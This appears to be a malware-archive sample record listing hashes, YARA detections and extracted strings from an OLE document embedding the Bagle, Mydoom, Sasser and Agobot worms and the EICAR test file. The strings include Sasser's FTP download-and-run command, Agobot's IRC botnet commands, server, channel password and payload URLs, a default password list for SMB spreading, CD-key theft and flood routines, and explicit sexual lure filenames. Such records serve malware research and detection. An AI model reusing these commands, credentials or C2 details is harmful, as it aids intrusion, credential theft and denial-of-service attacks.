Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: 12fb581c91a43ea825061d4f376d9180 --

Hashes
MD5: 12fb581c91a43ea825061d4f376d9180
SHA1: a3180ca86499f5d3f2b7e5c11a0a19b0873071b9
SHA256: 3c0cd07ed0cbc3612e37665e800eff02d518ddcf6031dd1b31bc0dddc4c3c2c3
SSDEEP: 6144:9J/qQK1RnTSH6oyA157HALN17BniKU8vD9B+NRReap23CCwY:X/XEu9HALN1tnxRr9KDp2t
Details
File Type: Composite
Yara Hits
CuckooSandbox/shellcode | CuckooSandbox/embedded_pe | CuckooSandbox/embedded_win_api | YRP/maldoc_getEIP_method_1 | YRP/office_document_vba | YRP/Contains_VBA_macro_code | YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/maldoc_OLE_file_magic_number | YRP/Dropper_Strings | YRP/Obfuscated_Strings | YRP/Misc_Suspicious_Strings | YRP/network_tcp_listen | YRP/network_irc | YRP/network_http | YRP/network_tcp_socket | YRP/network_dns | YRP/screenshot | YRP/keylogger | YRP/win_mutex | YRP/win_registry | YRP/win_private_profile | YRP/win_files_operation | YRP/win_hook | YRP/VC8_Random | YRP/spyeye | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Wininet_Library | YRP/Str_Win32_Internet_API | YRP/Str_Win32_Http_API | YRP/UPX | YRP/suspicious_packer_section |
Strings
		SsmgV.01
TextV.01
OLE Package
Package
1cd36835080c48bf_Email-Worm.Win32.Bagle
\\192.168.200.134\Shared\attachment\1cd36835080c48bf_Email-Worm.Win32.Bagle
C:\Users\ADMINI~1\AppData\Local\Temp\1cd36835080c48bf_Email-Worm.Win32.Bagle
fgfgfhfghfuuyuyiuiuyiuufnhg
%6U96U9:U96UC6U96U
96U9:U96UC6U96U
#6U96U9:U96UC6U96U
96U9:U96UC6U96U
KERNEL32.DLL
USER32.DLL
GetProcAddress
LoadLibraryA
ExitProcess
VirtualAlloc
VirtualFree
MessageBoxA
}R~:oW!
SDQ f-C
K{=q}e
XWrb-G
=Sf8F7
z@`cJ@j
SS2CX7
Tf2F6^
>IT%uy\
FB/88w
p9sZ@>c-sN
?vpX#B
 P5p"-&
Q 3>]~
Er9=<;%5
Y~!Dsa49
$ia<'3
G*NP>}
Rtej/J
n+4#yZ
V8Ci1W&p2k4
METAFILE
Segoe UI
1cd36835080c48bf_Email-Worm.Win32.Bagle
"System
VDA_DOC
\\192.168.200.134\Shared\attachment\eicar
C:\Users\ADMINI~1\AppData\Local\Temp\eicar
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
METAFILE
Segoe UI
"System
VDA_DOC
OLE Package
Package
METAFILE
Segoe UI
Email-Worm.Win32.Mydoom
\\192.168.200.134\Shared\attachment\Email-Worm.Win32.Mydoom
C:\Users\ADMINI~1\AppData\Local\Temp\Email-Worm.Win32.Mydoom
!This program cannot be run in DOS mode.
kernel32.d
ll5root\IEFrame
H_Noterctrl_renwnd
%s, %u
(dnsapiUiphlp
DQnr9A5
workPals
vl+|tifi
.gKli/
8rvKubmi
gold-QIca festn
Koftci'
og#gnu
.@donex|_
USERPROFILE
 $T},{
?hm $A+rm b
XM){:|,}|
t}{.|*)
{i^|Y}
e{-Amm
BbeL|w
k+j|5q
|ObvN4
h&Zk?9
sBCY}sa
+ da,Dt
vC4(s)d:
\zpT?+
x^'0;}7Z 
q</>G#
@$F|OZ)
$f^s}3s
6,1tB=
BOX NO
FOUND|
}kDATA
d400-aqr
%m-E-OPEoUT,
-RMS@CRE<A
d7SYSTEM-F<XDI
AB=sk<d(
lCccu	7+
"C"PAT
,Q"K Os
ABCDEFGHIJKLMc
PQRSUVWXYZ4c
vwkz0123456
3IMEO(4
xG;!	b
y="N"1
zZjf0E
o~Ab164"
zq>SMTP%
TyqsN/
p?lpv=1&
=web&#l[
)s&kgs=0
8&o=fp-
&M=mG!k
ws\Cu4
I2^?SW
 MiserS
rv/icN
4MeProc
3UA$tv3
6v5;C}0
0^]8PU
d_t$@SD
w!"Vc-t#Vh
S53StIC
VyGWSY
jU.`h 
G2]`k+[
ware\MY
eYicros
eof\WY
AB\WAeY
eB4\Wa
b FileP
eY Nam8H
xt@5<w_u
tting,[AYs
}vr, +hh
Rcu|&J
o5j-GX
u$0h`c?
@'Y<'p
h4'&lp
	sPH~$
Dt9HHt-
RxN< r
76~=t=<+
qr&PW_
"R\_pAL
nbF2><:
,rS9BP
=+~/+&xy
d6TS4n
;D11L<
F1FfXB`
;3HG!$6
9ht,% 
y<s&$'25p
{x%7Hh
hHGWKP
plhd`\i
iXTPLH
tld\TLi
iD80( 
)(2a13.&3 ,a" //.5a#$a34/a(
a,.%$oLLKeA
AN@J@F
faQ1&,
u'`MHCH
*$3/$-
cd2cFdoyk
V78o-f;U
"(5$A9
FMPWDHOUEJ
VGKNTA@CBBEC@DP/
DDGF6n@$5
./I"O%
|ah+$+9B
1C%xD=
_Mxq?QQ.
Uq-!V\<N
_? xxI
_uq#?a
1la)%P
O2XU@4n
)p"\1>
<gSvQf=
*P;9u;
UABz@b
.	3B+9
DKW$DW
I$22U`
2$	 /%
>E$/" 
(#3 38s
62131'
	SLC2I
dZGB-n
Ebz!o%
/0(/5'
FindCD
MapViewOf
}TimF*
{p^g-L
n_ ~LibrNyA!
]Dl4MoByt"
TGPoi(
:$9aok
+3*a*!
NBuffA
`.data
wwwwwww
KERNEL32.DLL
ADVAPI32.dll
MSVCRT.dll
USER32.dll
WS2_32.dll
LoadLibraryA
GetProcAddress
ExitProcess
RegCloseKey
memset
wsprintfA
5[+&	9
ckRj2'
n\wVc\
;mr*!Hb5
Email-Worm.Win32.Mydoom
"System
VDA_DOC
OLE Package
Package
METAFILE
Segoe UI
Net-Worm.Win32.Sasser
\\192.168.200.134\Shared\attachment\Net-Worm.Win32.Sasser
C:\Users\ADMINI~1\AppData\Local\Temp\Net-Worm.Win32.Sasser
!This program cannot be run in DOS mode.
.newIID
SVWh8o@
j	h;d@
j	h;d@
jhhHd@
D$ hTj@
D$dh|j@
SPVVhe
YYh `@
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
DSUVWh
t.;t$$t(
VC20XC00U
^Vh$T@
PVh8o@
0B=(o@
VWuBhdT@
tPhHT@
[Sh$T@
"WWSh8o@
runtime error 
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
&Ky$0Ky
wsprintfA
USER32.dll
GetProcAddress
LoadLibraryA
lstrcpyA
_lclose
_lwrite
_lcreat
_lread
_lopen
GetModuleFileNameA
CreateThread
WinExec
GetLastError
GetTickCount
CreateMutexA
CopyFileA
GetWindowsDirectoryA
KERNEL32.dll
WS2_32.dll
AbortSystemShutdownA
RegCloseKey
RegSetValueExA
RegOpenKeyA
ADVAPI32.dll
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
ExitProcess
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
HeapDestroy
HeapCreate
VirtualFree
HeapFree
RtlUnwind
WriteFile
MultiByteToWideChar
GetStringTypeA
GetStringTypeW
GetCPInfo
GetACP
GetOEMCP
HeapAlloc
VirtualAlloc
HeapReAlloc
LCMapStringA
LCMapStringW
YZqvgff
PC NETWORK PROGRAM 1.0
LANMAN1.0
Windows for Workgroups 3.1a
LM1.2X002
LANMAN2.1
NT LM 0.12
NTLMSSP
NTLMSSP
150 OK
200 OK
226 OK
230 OK
331 OK
220 OK
avserve2
avserve2.exe
echo off&echo open %s 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get %i_up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&%i_up.exe&echo off&del cmd.ftp&echo on
127.0.0.1
c:\win2.log
\\%s\ipc$
%i.%i.%i.%i
JumpallsNlsTillt
Jobaka3
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
kernel32.dll
LoadLibraryA
GetProcAddress
VirtualAlloc
VirtualFree
SQRWVU
]^_|	ZY[
Entry Point Not
 Found
The proce
dure e#p
#%s could not be
 located in the 
dynamic link lib
rary %s.Qord
inal %d
C[any]
r32.dll
MessageB
wsprintfA
rnel"ExitPV
USQWRV
^Z_Y[]
ADVAPI32.DLL
AbortSystemShutdownA
RegOpenKeyA
RegSetValueExA
RegCloseKey
kernel32.dll
LoadLibraryA
lstrcpy
_lclose
_hwrite
_lcreat
_hread
_lopen
GetModuleFileNameA
CreateThread
WinExec
GetLastError
GetTickCount
CreateMutexA
CopyFileA
GetWindowsDirectoryA
GetProcAddress
HeapReAlloc
VirtualAlloc
HeapAlloc
GetOEMCP
GetACP
GetCPInfo
GetStringTypeW
GetStringTypeA
MultiByteToWideChar
WriteFile
RtlUnwind
HeapFree
VirtualFree
HeapCreate
HeapDestroy
GetFileType
LCMapStringW
LCMapStringA
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
ExitProcess
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsA
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
LockResource
GetStdHandle
user32.dll
wsprintfA
WS2_32.dll
accept
socket
connect
listen
gethostname
inet_ntoa
inet_addr
gethostbyname
WSAStartup
closesocket
Net-Worm.Win32.Sasser
"System
VDA_DOC
OLE Package
Package
METAFILE
Segoe UI
P2P-Worm.Win32.Agobot
\\192.168.200.134\Shared\attachment\P2P-Worm.Win32.Agobot
C:\Users\ADMINI~1\AppData\Local\Temp\P2P-Worm.Win32.Agobot
!This program cannot be run in DOS mode.
Richex
`.rdata
@.data
D$LSVW
D$@|"C
D$@t"C
D$@p"C
D$@l"C
D$@h"C
D$8d"C
D$@`"C
RQPh0(C
QPhx(C
RPhl(C
VWPh<'C
D$ X)C
PQhl(C
L$$PQR
t%hj0B
QPhD2C
t%hj0B
t$hj0B
t$hj0B
RQh41C
t$hj0B
T$dh40C
t%hj0B
PRhl(C
PQhl(C
QRhP/C
t%hj0B
PWhl(C
t$hj0B
QRhP.C
L$TQh$.C
PQRWh(-C
tghL+C
RPhD*C
L$TQh$.C
D$XSUVWh
D$TQRPPj(j
D$\VWh
D$ RPj
SUVWPQh
SUVWPQh
F,_^[Y
D$$_^]
;:u+UW
09n ud
PWWWWWWWh
u	_^]2
PQhp7C
D$Pj(R
L$4_^][d
D$TSUVW
T$<QPR
D$4SVW
D$(H'C
D$(l"C
D$(h"C
L$th`9C
T$$QWVR
L$$PWVQ
D$$_^]
D$(SUV
D$ VPQ
SQh\,C
QUSShTKC
RUSShTKC
,SUVW3
L$<_^][d
D$ SUV
L$ PQV
L$0h|QC
RPh0QC
QRh@SC
QRh SC
PQSSj(SSSRS
D$ u	W
t|Vh|7C
D$,QRP
QQSVWd
t.;t$$t(
uRFGHt
sO;>|C;~
VC20XC00U
HHtpHHtl
btHHt.
QQSVWj
>:uNFV
>:u#FV
<]t_G<-uA
"WWSh0
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
PPPPPPPP
PPPPPPPP
PPPPPPPP
QQSUVWj
_^][YY
+ttHHtd
VWuBh|
HSVHWtgHHtF
t/WWUPj
QQSVW3
D$0f9D$,t
T$ PQR
SVWUu	3
SVWUu	3
SVWUu	3
\$XRSVP
T$XPRV
T$ )L$$j
L$4+D$$
L$,+D$ Q+
(SVWh 
t"h8jC
SVWu	3
D$49D$ u
tSf@f=
t$4SWV
\$4USWVj
l$8USWVj
\$8USWV
\$4USWVj
\$4USWVP
L$0QSWPV
D$,+D$$PSQRV
T$(QRV
T$$PQRV
D$,+D$$PQRV
\$<PQSV
D$8+D$0+D$(
D$$+D$
L$DPQSV
;D$0u,
D$8QRPV
D$D+D$<PQRV
D$HSQRPVW
T$dPQRV
L$TPQhLjC
T$lQRV
D$LQPV
T$lQRV
T$dPQRV
D$P+D$H+D$@
t$dSWV
\$dPSWVj
\$dPSWVj
\$dPSWVj
D$h]_^[
t$PWUj
D$H+D$@
D$$UPS
\$,PWVSVt
|$4QRVW
T$@PQVWRW
T$@PQVWRW
L$8PQVWSW
T$@QPVWRW
L$(9L$
D$<_^[
t$ WUj
t$XSWV
\$XPSWVj
\$XPSWVj
D$\_^[
QSUVWj
n0SSSSU
_SSSSU
Ph_^][Y
tD9_Pt?
(wqt\HHtS
t>Ht Ht
hWj@_;
t	9p$u
PPPPhd
tvWWWWU
F,_^][
+tJHt:Ht*
PWVWWW
^,_^][
CWinApp
PreviewPages
Settings
CWinThread
CCmdTarget
CDialog
MS Sans Serif
MS Shell Dlg
CComboBox
CTempWnd
AfxOldWndProc423
AfxWnd42s
AfxControlBar42s
AfxMDIFrame42s
AfxFrameOrView42s
AfxOleControl42s
GetMonitorInfoA
EnumDisplayMonitors
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
GetSystemMetrics
USER32
DISPLAY
commctrl_DragListMsg
InitCommonControlsEx
COMCTL32.DLL
CTempMenu
CTempGdiObject
CTempDC
CGdiObject
CPaintDC
CUserException
CResourceException
combobox
software
CObject
CNotSupportedException
CMemoryException
CException
System
CMapPtrToPtr
MSWHEEL_ROLLMSG
H:mm:ss
dddd, MMMM dd, yyyy
M/d/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
`h````
ppxxxx
(null)
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GAIsProcessorFeaturePresent
KERNEL32
runtime error 
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
1#QNAN
1#SNAN
string too long
invalid string position
Button
ListBox
ComboBox
Static
ComboLBox
Unknown exception
InternetOpenA
InternetCloseHandle
InternetReadFile
InternetOpenUrlA
HttpSendRequestA
HttpOpenRequestA
InternetConnectA
InternetCrackUrlA
WININET.dll
mciSendStringA
WINMM.dll
WSASocketA
WS2_32.dll
WNetCancelConnection2A
WNetAddConnection3A
MPR.dll
CloseHandle
GetTempPathA
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
LoadLibraryA
GetTickCount
GetSystemDirectoryA
OpenProcess
TerminateThread
TerminateProcess
DeleteFileA
CreateProcessA
CreateThread
CopyFileA
ExpandEnvironmentStringsA
WriteFile
CreateFileA
LockResource
LoadResource
FindResourceA
FreeLibrary
InitializeCriticalSection
DeleteCriticalSection
GetComputerNameA
WaitForSingleObject
LeaveCriticalSection
EnterCriticalSection
GetPrivateProfileStringA
GetVersionExA
GlobalMemoryStatus
GetCurrentThreadId
GetCurrentThread
lstrcmpiA
lstrcmpA
GlobalDeleteAtom
GlobalAlloc
GlobalLock
InterlockedIncrement
InterlockedDecrement
lstrlenA
WideCharToMultiByte
MultiByteToWideChar
GlobalFree
GlobalUnlock
lstrcpyA
GlobalFindAtomA
GlobalAddAtomA
GlobalGetAtomNameA
lstrcatA
GetVersion
SetLastError
MulDiv
LocalFree
LocalAlloc
TlsAlloc
GlobalHandle
TlsFree
GlobalReAlloc
TlsSetValue
LocalReAlloc
TlsGetValue
lstrcpynA
GlobalFlags
WritePrivateProfileStringA
GetLastError
GetProcessVersion
SizeofResource
GetCPInfo
GetOEMCP
SetErrorMode
GetCurrentProcess
ReadFile
SetFilePointer
FlushFileBuffers
SetEndOfFile
RtlUnwind
ExitProcess
GetTimeZoneInformation
GetSystemTime
GetLocalTime
HeapFree
HeapAlloc
RaiseException
HeapReAlloc
GetStartupInfoA
GetCommandLineA
HeapSize
GetACP
HeapDestroy
HeapCreate
VirtualFree
VirtualAlloc
IsBadWritePtr
LCMapStringA
LCMapStringW
SetUnhandledExceptionFilter
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetStringTypeA
GetStringTypeW
IsBadReadPtr
IsBadCodePtr
SetStdHandle
CompareStringA
CompareStringW
SetEnvironmentVariableA
KERNEL32.dll
MessageBoxA
LoadIconA
SendMessageA
AppendMenuA
GetSystemMenu
DrawIcon
GetClientRect
GetSystemMetrics
IsIconic
DestroyWindow
CloseWindow
GetWindowThreadProcessId
EnumChildWindows
PostMessageA
FindWindowExA
SetWindowPos
SetWindowTextA
FindWindowA
EnableWindow
PeekMessageA
GetParent
SetActiveWindow
GetActiveWindow
IsWindowEnabled
CreateWindowExA
RegisterClassA
UnregisterClassA
IsWindow
SetWindowLongA
DefWindowProcA
GetWindowLongA
PostQuitMessage
SetCursor
GetLastActivePopup
SetWindowsHookExA
GetCursorPos
IsWindowVisible
ValidateRect
CallNextHookEx
GetKeyState
DispatchMessageA
TranslateMessage
GetMessageA
GetNextDlgTabItem
GetFocus
EnableMenuItem
CheckMenuItem
SetMenuItemBitmaps
ModifyMenuA
GetMenuState
LoadBitmapA
GetMenuCheckMarkDimensions
GetDlgItem
CreateDialogIndirectParamA
EndDialog
GetWindowRect
GetWindowPlacement
SystemParametersInfoA
IntersectRect
OffsetRect
RegisterWindowMessageA
GetWindow
SetForegroundWindow
GetForegroundWindow
GetMessagePos
GetMessageTime
RemovePropA
CallWindowProcA
GetPropA
UnhookWindowsHookEx
SetPropA
GetClassLongA
GetDlgCtrlID
GetWindowTextA
GetWindowTextLengthA
GetMenuItemID
GetSubMenu
GetMenuItemCount
GetMenu
GetClassInfoA
wsprintfA
WinHelpA
GetCapture
GetTopWindow
CopyRect
ScreenToClient
AdjustWindowRectEx
SetFocus
GetSysColor
MapWindowPoints
SendDlgItemMessageA
UpdateWindow
IsDialogMessageA
ShowWindow
LoadStringA
DestroyMenu
ClientToScreen
ReleaseDC
GetWindowDC
BeginPaint
EndPaint
TabbedTextOutA
DrawTextA
GrayStringA
LoadCursorA
GetClassNameA
PtInRect
GetSysColorBrush
InvalidateRect
USER32.dll
CreateBitmap
GetClipBox
SetTextColor
SetBkColor
GetObjectA
DeleteDC
SaveDC
RestoreDC
SelectObject
GetStockObject
SetBkMode
SetMapMode
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
SetWindowExtEx
ScaleWindowExtEx
IntersectClipRect
DeleteObject
GetDeviceCaps
CreateSolidBrush
PtVisible
RectVisible
TextOutA
ExtTextOutA
Escape
GDI32.dll
comdlg32.dll
ClosePrinter
DocumentPropertiesA
OpenPrinterA
WINSPOOL.DRV
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
RegSetValueExA
RegCreateKeyExA
RegDeleteValueA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
COMCTL32.dll
InterlockedExchange
GetProfileStringA
IsWindowUnicode
CharNextA
InflateRect
DefDlgProcA
DrawFocusRect
ExcludeUpdateRgn
ShowCaret
HideCaret
PatBlt
GetTextExtentPointA
BitBlt
CreateCompatibleDC
CreateDIBitmap
Mozilla/4.0 (compatible)
IcmpSendEcho
IcmpCloseHandle
IcmpCreateFile
ICMP.DLL
Usage: <filename.exe> -h -c
h - Show this help
c - Start a clone (-c <server>)
You did not specify a server
--clone
--help
Process32Next
Process32First
CreateToolhelp32Snapshot
RegisterServiceProcess
kernel32.dll
NOTICE
PRIVMSG
Agobot Main Control - %s - %s - Offline
Connecting to %s.
smb_pseurl
http://www.blackzombie.cellig.com/psexec.exe
Samba Scanner - PSExec.exe URL
as_enabled
Autostart - Enabled
as_valname
Config Loader
Autostart - Value Name
bot_defurl
http://www.blackzombie.cellig.com/agobot.exe
Bot - Default URL
bot_cfgurl
http://www.blackzombie.cellig.com/default.cfg
Bot - Default Config URL
bot_defaultcfg
sysldr32.cfg
Bot - Default Config Filename
bot_prefix
Bot - Command Prefix
bot_id
Bot - Current ID
bot_filename
syschk.exe
Bot - Runtime Filename
bot_version
zombie-bot
Bot - Version
id_enable
Identd - Enabled/Disabled
id_type
Identd - System Type
id_port
Identd - Server Port
id_name
Identd - Full Name Prefix
id_userid
Identd - UserID Prefix
si_nick
Server Info - Nickname prefix
si_password
Server Info - Server password
si_port
Server Info - Port to connect to
si_server
bots.unixcon.net
Server Info - Server to connect to
si_chanpwd
bzteam
Server Info - Channel Password
si_mainchan
#bots1
Server Info - Main Channel
Connected to %s.
later, dude
Reconnecting.
Disconnected.
crappy.ircd.com
Connected to %s as %s
NOTICE %s :%s %s
NOTICE %s :
VERSION %s
Agobot
VERSION
*** Joins: %s (%s@%s)
Joined channel %s.
*** Parts: %s (%s@%s)
User %s logged out.
Screw you %s!
JOIN %s %s
You were kicked from %s by %s, rejoining.
%s %s!
Give me my ops back
Thanks for the ops
Give me my voice back
Thanks for the voice
4.0.0.0/8
24.0.0.0/8
211.0.0.0/8
scannetbios
.autoscan
update
.autoupdate
Agobot Main Control - %s - %s - Online
[%02d:%02d] %s
PRIVMSG %s :%s
USERHOST %s
-> *%s%s* %s
<%s%s> %s
Parsed command: %s
Password accepted.
User %s logged in from %s.
<C> *%s%s* %s
%s ready. Up %dd %dh %dm. Release Version
Successfully added files to users Kazaa/Grokster/Bearshare share.
Successfully added files to users Kazaa/Grokster/Bearshare share. (forced)
reconnecting
Found Warcraft III CDKey: %s
Warcraft III
Get CD-Key
/me is a friendly program!!!
CD Key Grabber
c:\cdkgrab.exe
Found SOF2 CDKey (%s).
mtkwftmkemfew3p3b7
%s\base\mp\%s
sof2key
InstallPath
Software\Activision\Soldier of Fortune II - Double Helix
Found NWN CDKey (%s).
nwncdkey.ini
Location
Software\BioWare\NWN\Neverwinter
Software\Unreal Technology\Installed Apps\UT2003
Found Half-Life CDKey (%s).
Software\Valve\Half-Life\Settings
%d. %s / "%s" / %s
<num> - <name> - <value> - <description>
-[cvar list]-
%s by Ago (theago@gmx.net). homepage: http://none.yet/
-[thread list]-
%d. %s = %s
-[alias list]-
%d. %s
-[process list]-
Read config from %s.
Saved config as %s.
Deleted config %s.
Updated config from %s.
%s == "%s"
nbscan (%s)
set CDAudio door open
cd-rom drive tray opened
set CDAudio door closed
cd-rom drive tray closed
NICK %s
JOIN %s
thread(s) killed.
couldn't open file.
file opened.
couldn't resolve host
%s -> %s
removing bot...
%s = "%s" (was "%s")
ACTION %s
PART %s
MODE %s
Deleted old config %s.
downloading update from %s...
update (%s)
%s\%s.exe
couldn't execute file.
Created clone on %s:%s
Failed to create clone
clone (%s:%s)
Deleted %s successfully
Unable to delete host %s
registry key not found
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_CONFIG
HKEY_CLASSES_ROOT
downloading %s...
download (%s)
redirect created on port %s to %s:%s.
redirect (%s->%s:%s)
syn (%s)
sending %s udp packets to: %s. packet size: %s, delay: %s[ms].
udp (%s)
Updated %s successfully
Unable to update host %s
DELRR %s A
Added %s successfully
Unable to add host %s
ADDRR %s A %s
LOGIN %s %s
ods.org
sending %s pings to %s. packet size: %s, delay: %s[ms]
ping (%s)
odsaddrr
odsupdate
synflood
redirect
download
readreg
odsdelrr
execute
repeat
action
privmsg
cvar_set
remove_all_but
c_kill
server
prefix
killall
killthread
cdtray
gethost
cvar_get
cvar_update
cvar_delconfig_from
cvar_saveconfig_as
cvar_loadconfig_as
c_list
remove
sysinfo
netinfo
aliases
threads
cvar_list
getcdkey
getedu
disconnect
reconnect
addfilesharing_force
addfilesharing
rndnick
status
cvar_delconfig
cvar_saveconfig
cvar_loadconfig
logout
Software\Microsoft\Windows\CurrentVersion\RunServices
Software\Microsoft\Windows\CurrentVersion\Run
%%comspec%% /c %s %s
@echo off
:start
if not exist ""%1"" goto done
del /F ""%1""
del ""%1""
goto start
del /F %temp%
del %temp%
%s\r.bat
huh, user closed me, dude
CCrossThreadsMessagingDevice_HiddenWindow
%d Syn Packets Has Been Sent In %d Seconds
send error! %s
setsockopt IP_HDRINCL error!
Socket Setup Error!
synflooding %s port %u for %u seconds, %d ms delay.
%d.%d.%d.%d
Try server %[^ ,], port %d
Your host is %[^ [,], running version %s
USER %s %s %s :%s
NICK %s
PASS %s
Failed to connect to host!
Failed to create socket!
QUIT :%s
%s : USERID : %s : %s
PONG %s
update:die:remove:server:download:spy
P_oGrOm
Bl4cKZ0mBI3.users.undernet.org
<change me plz>
P_o_GrOm
Logged
Columbus.Private.Net
http://
Hoyle Card Games 2003
Us Open 2002
Hyper Rails
HOYLE PUZZLE GAMES 2003
Puzzles battles of the history
Snow Drop
Emperor Rise of the Middle Kingdom
Reel Deal Slots Volume II
AFL Live 2003
Squad Battles Eagles Strike
Earth 2150 Lost Souls
Midnight Outlaw Street Racing
Deep Fritz 7
Virtual Resort Spring Break
Divine Divinity
Zelenhgorm The Great Ship
Kango Shicyauzo
Action Man Destruction X
Blue's Clues Preschool
Jurassic Park Dinosaur Battles
Maximum G-Force Coasters
Empire Earth Art of Qonquest
Ultimate Pinball
Frontline Attack War over Europe
Bandits - Phoenix Rising
Taz Wanted
Pro Soccer Cup 2002
Jeopardy! 2003
Prisoner Of War
Links 2003
Total Club Manager 2003
Sniper Path of Vengeance
Links 2003 Championship Courses
Law and Order Dead on the Money
Ultimate Ride Disney Coaster
Dogs Playing Poker
The Sims Unleashed
Stronghold Crusader
Virtual Skipper 2
Combat Mission 2
Iron Storm Action
Exodus Action
X-Plane
Project Nomads
Bongo Boogie
NHL 2003
ParaShooter
Emperor
Virtual Sailor
Battlefield 1942
Kickoff 2002
Brixout XP
Star Wraith 3
Madden NFL 2003
BANDITS Phoenix Rising
Pox Puzzle
Starshatter v3
Virtual Resort
Conflict Desert Storm
Delta Force Black Hawk Down
Unreal Tournament 2003
Scarlet Waves
Halloween
No One Lives Forever 2
World War II
Iron Storm
The Gates
Asswipe
Fartknocker
High Grow
Ganja Farmer 2
Duke Nukem Forever
Jedi Knight 2
Quake 3
Quake 2
Quake 1
Shattered Galaxy
Diablo 2
Diablo
Starcraft
Warcraft
Warcraft 2
Warcraft 3
UT2003
%s crack (all versions)
%s newest version crack
%s 3D Setup
%s - Cable Modem Playfix
%s - ADSL Playfix
%s - Unlock Everything Trainer
%s - Crack all versions
%s - Internet Play Fix
%s - NOCD Patch
%s - Tweaking utility
%s - Autotuning (for Newbies)
%s - CD Key Generator
%s - Newest Patch
%s - Character Cheat
%s - Map Hack
%s - Idem Duplicator
%s - Item Hack
%s - Multiplayer Cheat
%s - Unlimited Healt Trainer
%s - Game Trainer
Kylie Minogue
Shakira
Christina Aguilera
Britney Spears
Michelle Behennah
Kate Moss
Helena Christensen
Emma Sjoberg
Stacey Keibler
Karina Lombard
Kylie Bax
Cameron Diaz
Lexa Doig
Belinda Chapple
Alessandra Ambrosia
Kirsten Dunst
Halle Berry
Salma Hayek
Charlize Theron
Katie Price
Pamela Anderson
Donna D'Erico
Ashley Judd
Carmen Electra
Jessica Alba
Amanda Peet
Sandra Bullock
Gillian Anderson
Anna Kournikova
Samantha Mumba
Chandra North
Kelly Hu
Jolene Blalock
Watch %s sucking and fucking - XXX
oh my, horny %s - XXX
%s is very horny atm - XXX
Instant access to %s-picture download - XXX
%s's webcam - cracked access - no cost - XXX
%s's webcam - view livecast - XXX
%s in bed with some guy - XXX
%s giving VERY good blowjob XXX
%s getting it on with Usama Bin Laden - XXX
%s getting it on with George W. Bush - XXX
Big Boobs Part II XXX - %s
Spreading Wide XXX - %s
Huge Tits XXX - %s
Big Tits XXX - %s
buttfuckin %s - XXX
cum all over %s - XXX
%s lesbian love - XXX
h4x %s's c0mput3r 4nd s3nd h3r 3m41l - mus7 d0wnl04d - 1337 h4x0r - XXX
%s, very good pic (must download) - XXX
%s getting on with it! - XXX
%s sucking dick - XXX
%s spreading VERY wide!! - XXX
Free %s celeb pics xxx playboy fuck port huge boobs nude hardcore - XXX
Pictures of %s - hot pics! - XXX
Sexy %s nude pics xxx playboy porn pics
Anal Sex - %s - XXX
%s doing hardcore xxx
%s nude fucking hardcore xxx huge boobs
Hardcore XXX - %s
Celebrity XXX - %s
\GF2 - all versions crack.exe
DisableSharing
Software\Kazaa\LocalContent
DlDir0
Software\Kazaa\Transfer
Sharing
szSharedDir1
notfound
\FreePeers.ini
InstallDir
Software\BearShare
Software\Grokster\LocalContent
secret
foobar
patrick
123abc
1234qwer
123123
121212
111111
enable
godblessyou
ihavenopass
123asd
Internet
computer
123qwe
sybase
oracle
abc123
database
passwd
88888888
11111111
00000000
000000
654321
123456789
12345678
1234567
123456
Password
password
Unknown
Inviter
Administrador
Standard
Default
Administrateur
administrator
Administrator
scan of %s finished.
scanning subnet %s for %d seconds.
scanning ip %s.
\%s -c -d woinggg.exe
\\%s\IPC$
\woinggg.bat
woinggg.exe
\psexec.exe
255.255.255.255
connection type: %s (%s). local IP address: %d.%d.%d.%d. connected from: %s
dial-up
InternetGetConnectedStateEx
WININET.DLL
cpu: %dMHz. ram: %dKB total, %dKB free. os: Windows %s (%d.%d, build %d). uptime: %dd %dh %dm
%s [%s]
invalid URL.
error visiting URL.
url visited.
bad url, or dns error.
update failed: error executing file.
